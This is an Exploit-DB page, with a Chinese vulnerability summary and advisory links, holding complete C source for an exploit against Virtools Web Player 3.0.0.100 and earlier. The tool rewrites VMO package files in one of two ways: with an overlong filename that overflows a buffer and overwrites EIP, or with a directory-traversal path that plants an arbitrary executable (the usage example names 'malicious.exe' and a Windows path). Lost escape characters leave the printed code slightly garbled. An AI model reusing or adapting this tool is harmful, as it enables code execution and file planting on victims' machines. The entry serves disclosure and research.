https://www.exploit-db.com/exploits/1239
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-003

VirtoolsWebPlayer是virtools导出到网页所需要的播放器VirtoolsWebPlayer3.0.0.100及之前版本存在缓冲区溢出，远程攻击者可以通过长文件名执行任意代码。

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifdef WIN32
    #include <io.h>

    typedef unsigned char   u_char;
    typedef unsigned int    u_int;
    #define ftruncate   chsize
#else
    #include <unistd.h>
    #include <sys/types.h>
#endif



#define VER     "0.1"
#define SIGN    "Nemo"
#define FILE1   "components"
#define FILE2   "objects"
#define FMT     "%-10u"
#define EIP     "xdexc0xadxde"
#define BOF     "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
                "aa" EIP
#define BOFFILE "Nemo il pesce scemo"



u_int putfile(FILE *fdout, char *fname);
void std_err(void);



struct {
    u_char  sign[4];
    u_int   unknown1;   // 0x694620
    u_int   crc;        // ???
    u_int   unknown2;   // big-endian sdk version?
    u_int   plugin1;
    u_int   plugin2;
    u_int   unknown3;   // 12
    u_int   compcsz;
    u_int   objcsz;
    u_int   objsz;
    u_int   addpath;    // ???
    u_int   components;
    u_int   objects;
    u_int   zero;       // ???
    u_int   version;
    u_int   compsz;
} vmo;



int main(int argc, char *argv[]) {
    FILE    *fd;
    u_int   i,
            len,
            off;
    int     attack;
    u_char  fname[512],
            *vmofile,
            *addfile,
            *addpath;


    setbuf(stdout, NULL);

    fputs("n"
        "Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs "VER"n"
        "by Luigi Auriemman"
        "e-mail: [email protected]"
        "web:    http://aluigi.altervista.orgn"
        "n", stdout);

    if(argc < 3) {
        printf("n"
            "Usage: %s <attack> <file.VMO>n"
            "n"
            "Attack:n"
            " 1 = buffer-overflown"
            " 2 = directory traversal, is needed to specify also the file to add and then"
            "     special path for exploiting the bugn"
            "n"
            "Example: virtbugs 1 tintoys.vmon"
            "Example: virtbugs 2 tintoys.vmo malicious.exe ..\..\..\..\windows\runme.pifn"
            "Note:    will be replaced only the latest file in the packagen"
            "Note:    if you need a quick VMO file use the following:n"
            "           http://www.virtools.com/downloads/vmo/Tintoys/tintoys.vmo"
            "n", argv[0]);
        exit(1);
    }

    attack  = atoi(argv[1]);
    vmofile = argv[2];

    if((attack != 1) && (attack != 2)) {
        fputs("nError: wrong attack number chosennn", stdout);
        exit(1);
    }

    printf("- open VMO file:    %sn", vmofile);
    fd = fopen(vmofile, "r+b");
    if(!fd) std_err();

    if(!fread(&vmo, sizeof(vmo), 1, fd)) std_err();
    off = ftell(fd);

    if(memcmp(vmo.sign, SIGN, sizeof(vmo.sign))) {
        printf("- file seems invalid, its sign is: %.*sn",
            sizeof(vmo.sign), vmo.sign);
    }

    printf(
        "  Informations and files list:n"
        "- components:       %un"
        "- objects:          %un"
        "- version:          %hhu.%hhu.%hhu.%hhun"
        "n",
        vmo.components,
        vmo.objects,
        (vmo.version >> 24) & 0xff, (vmo.version >> 16) & 0xff,
        (vmo.version >> 8)  & 0xff, vmo.version & 0xff);

    fputs(
        "  inSize     outSize    Filenamen"
        "  ------------------------------n", stdout);

    printf("  "FMT" "FMT" %sn", vmo.compcsz, vmo.compsz, FILE1);
    printf("  "FMT" "FMT" %sn", vmo.objcsz,  vmo.objsz,  FILE2);
    if(fseek(fd, off + vmo.compcsz + vmo.objcsz, SEEK_SET) < 0) std_err();

    for(i = 2; ; i++) {
        if(!fread(&len, 4, 1, fd)) break;
        off = ftell(fd) - 4;
        if(!fread(fname, len, 1, fd)) break;

        if(len > (sizeof(fname) - 1)) break; // checks
        fname[len] = 0;
        if(!*fname) break;

        if(!fread(&len, 4, 1, fd)) break;
        printf("             "FMT" %sn", len, fname);

        if(fseek(fd, len, SEEK_CUR) < 0) std_err();
    }

    if(i <= 2) {
        fputs("n"
            "Error: your VMO file doesn't contain additional files so cannot be modifiedn"
            "       try with anothern"
            "n", stdout);
        exit(1);
    }

    fseek(fd, off, SEEK_SET);

    if(attack == 1) {
        fputs("n- buffer-overflow bug exploitationn", stdout);
        len = sizeof(BOF) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOF, len, 1, fd);

        len = sizeof(BOFFILE) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOFFILE, len, 1, fd);

    } else if(attack == 2) {
        fputs("n- directory traversal bug exploitationn", stdout);
        if(argc < 5) {
            fputs("nError: you must specify also <your_file> and <bad_path>nn", stdout);
            exit(1);
        }
        addfile = argv[3];
        addpath = argv[4];

        len = strlen(addpath);
        fwrite(&len, 4, 1, fd);
        fwrite(addpath, len, 1, fd);

        len = putfile(fd, addfile);
    }

    fflush(fd);
    if(ftruncate(fileno(fd), ftell(fd)) < 0) std_err();
    fflush(fd);
    fclose(fd);
    printf("- added a file of %u bytesn", len);
    return(0);
}



u_int putfile(FILE *fdout, char *fname) {
    struct stat xstat;
    FILE    *fdin;
    u_int   len,
            tot = 0;
    u_char  buff[1024];

    fdin = fopen(fname, "rb");
    if(!fdin) std_err();
    fstat(fileno(fdin), &xstat);

    fwrite(&xstat.st_size, 4, 1, fdout);

    while((len = fread(buff, 1, sizeof(buff), fdin))) {
        fwrite(buff, len, 1, fdout);
        tot += len;
    }

    fclose(fdin);
    return(tot);
}



void std_err(void) {
    perror("nError");
    exit(1);
}

// milw0rm.com [2005-10-02]

来源:SECUNIA
名称:17034
链接:http://secunia.com/advisories/17034/
来源:BUGTRAQ
名称:20050930Buffer-overflowanddirectorytraversalbugsinVirtoolsWebPlayer
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112811771331997&w;=2
来源:MISC
链接:http://aluigi.altervista.org/adv/virtbugs-adv.txt
来源:BID
名称:14990
链接:http://www.securityfocus.com/bid/14990
来源:SECTRACK
名称:1014993
链接:http://securitytracker.com/id?1014993